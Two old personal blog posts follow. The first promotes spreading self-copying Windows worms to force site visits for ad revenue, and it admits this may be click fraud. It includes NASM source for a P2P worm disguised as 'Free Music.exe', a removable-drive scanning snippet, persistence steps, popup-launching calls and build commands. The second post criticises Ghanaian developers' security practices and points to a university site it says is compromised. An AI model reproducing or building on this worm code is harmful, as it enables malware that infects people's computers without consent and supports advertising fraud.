2010/08/31

Marketing in the *new* age using virii and worms for profit

I have coded bots, worms, virii and anything I can wrap my head around
of them all biological worms and virii are unique. But this post is
not about biocode
am talking about marketing with bots, I have seen one bot that does
this but it has a stupid payload and attacks too strong. Anyway am
here to discuss and show how to market successfully with a virus/worm.

I guess if this becomes a good technique the corporate greeds will
legalize coding virii and worms \0/ for business purposes o_O lol.

You may wonder why is this necessary, well einstein; some of us are
programmers(aka nerds) and when we are done coding a cool project,
marketing it becomes a heck of a job especially when everything we say
is technical also when you want to make money with Google AdSense this
is a vey good option. may be considered click fraud but hey you showed
them and they clicked who's to blame the interested client or the
coder ^_^

The whole idea is infect a system copy self to windir PS: most virii
and worms meant to do some sought of public announcements or activism
target consumer OSes and the head is windows it doesn't mean we hate
windows it means; thats where all the *dull* brains are and we *need*
them to know something or arise from their silent slumber.

So as I was saying the idea is when our child first gets to a
compatible system in this case windows it must first copy itself to
the Windows Directory then maybe write a registry rule to make it run
first when the system boots run child2(the one in the windir) and exit
child1 from probably a flash drive. now you can Winexec your site
which will in windows fire up the default browser with the address you
supplied and the user sees magic hey there's a site here lets see or
they may close it but if it keeps poping up like a TV ad they will
give in believe me I have studied psychology :D

you may now infect other removable drives and exes to spread around
quickly you may also spread through p2p ^^

Here is code for a p2p worm in asm(NASM)
PS: I don't even have to show this only a
*fool* wouldn't know how to spread hehe.

;############################
; This is in asm(NASM)      #
; compiled under OpenBSD4.6 #
;                           #
; lame p2p worm             #
;############################
[bits 32]
[global main]

[extern CopyFileA]
[extern ExitProcess]
[extern GetModuleHandleA]
[extern GetModuleFileNameA]

[segment code public use32 class='CODE']
 main:
    call [lame]
lame:
    pop     ebp
    sub  ebp, [lame]            ; w00t you don't know this << o_O

    call [ebp+GetModuleHandleA]

    push  dword [ebp+szpath]
    push  dword eax
    call  [ebp+GetModuleFileNameA]

    push  dword 0x00000000
    push  dword [ebp+fake]
    push  dword [ebp+szpath]
    call  [ebp+CopyFileA]
   
    push dword 0x00000000
    call [ebp+ExitProcess]

[segment data public use32 class='DATA']
szpath      db 0x00000000
            times 0x00000100-$+szpath db 0 ; 256d

fake      db "C:\Progra~1\LimeWire\Free Music.exe", 0

This code is fully functional but not good :(
fake can be collect from many of the warez sites and stuff like
that. To compile in UNIX/Linux use
nasm -fwin32 lame_p2p.asm
./alink -oPE lame_p2p win32.lib -entry main

For the alink you can download the old version and port it or wait for
me to release my port which has some funny errors
alink.c:257: warning: sizeof(pointer) possibly incorrect in argument 3

This is because am using strlcpy with a pointer as size and also am
compiling with
cc -O2 -pipe  -Wall -Werror -Wstrict-prototypes -c alink.c

if I take off -Werror -Wstrict-prototypes everything works fine I'll
think about releasing it like that or corrected :)

Anyway how to spread with removable drives I have all the code but I
don't want to copy and share :( I'll share when I perfect it.

a little snippet though

...
    mov   word [ebp+szletter], 0x00000041 ; letter 'A'

seekem:
    mov   ecx, dword [ebp+szletter]
    mov   byte [ebp+szdrv], cl       ; lol nice eh?
   
    push  dword [ebp+szdrv]
    call  [ebp+GetDriveTypeA]

    cmp   eax, DRIVE_REMOVABLE
    je    eatit                    ; All removable Drives are mine
    inc   dword [ebp+szletter]
    cmp   word [ebp+szletter], 0x0000005a ; letter 'Z'
    jg    sleep_alil               ; should be sleep drives come and
                                   ; go u know :) Update:2010/06/15
                                   ; now we sleep hehe
    jmp   seekem

sleep_alil:
    push  0x00000014 ; 20 seconds ^^
    call  [ebp+Sleep]

    jmp   seekem     ; get back to work you idio

; Heres where you infect
eatit:
...


lol cool huh

ok so with that you get a lot of clicks and attention I think am tired
I'l continue later I think :D

oh I forgot the Winexec hehe

    push dword 0x00000005        ; SW_SHOW
    push dword [ebp+sitename]    ; eg http://www.google.com
    call [ebp+Winexec]

   
or if you want to use ShellExecute

    push dword 0x00000005        ; SW_SHOW        hehe
    push dword 0x00000000        ; [directory]   not needed
    push dword 0x00000000        ; [parameters]  not needed
    push dword [ebp+sitename]    ; [sitename] eg http://www.google.com
    push dword 0x00000000        ;
    push dword 0x00000000        ; [hwnd]
    call [ebp+ShellExecute]


Choose your weapon, Remember that writing these creatures(our children)
is an art so take time and don't make them hazardous
take them as you little army if you have ever taken Ninjutsu lessons
from a good *master* he trains you with discipline first spiritually
and physically code with passion and you will happy forever.

Happy hacking push that processor to the extreme :)

2010/08/30

Ghana web Security and code practice Pt1

I was considering not blogging again but when I think of it I really
need to because people and especially developers need to read stuff(or shit)
like the ones I write, I hate to write, main reason why I quit a lot of jobs;
but not when its very important.

This brings me to today's blog post; Ghana yes that beautiful nation that is in
my "opinion" slowly drowning herself because of her ignorant children.
Developers in Ghana have the habit of copy and paste and drag n drop, at least with
the most I have see. For example I saw a guy at swanzy(a shopping arcade) and he
says he wants to configure a cisco router and he needs an IBM T41/42 I asked, can't you
use something else and he says I don't want to suffer(meaning he doesn't want to hack it
I want to do "exactly" what is in the book, only thing I could say after that was
am no "robot".

I have worked, hired and fired developers as the IT manager of a firm in East-Legon
all because of two things "code design" and "security"; you can't give me a very
unmaintainable code and poor design for approval or appreciation and to worsen the case
the code is open to a lot of security issues, this may seem hash but I have watched
and monitored Universty of Ghana's website get hacked and remains hacked for 2 years+
till present day

Proof
in the source of University of Ghana Legon(ug)'s mother site and some pages there is
a hidden css that advertises viagara which leads to a teacher/student tutorial site

Tech Details:
   
css class name: .RUACZA
    after the style there is a div that
    contains the advert

 

Verify:
    Goto http://www.google.com and input
    viagara site:ug.edu.gh

Well after you see that I guess you get the idea and I could paste here
instructions and even code to replicate the attack they suffered, but I don't want any
issues as I could be charged with funny shit. Well this is not the only site
and proof I have. There are a lot more and if you want to check if your site has been hacked
or if its hackable don't hesitate to email me or leave a comment saying so, its FREE so
don't pressure me I have a lot on my chest.

Well am tired I'll continue this next time, in the meantime check that code
if it takes more than 20mins to trace a function behold you need to check your code design
and "ONLY" use OOP when "NECCESARY". That new school thing sucks return to the ways of C
you lame coders. ;p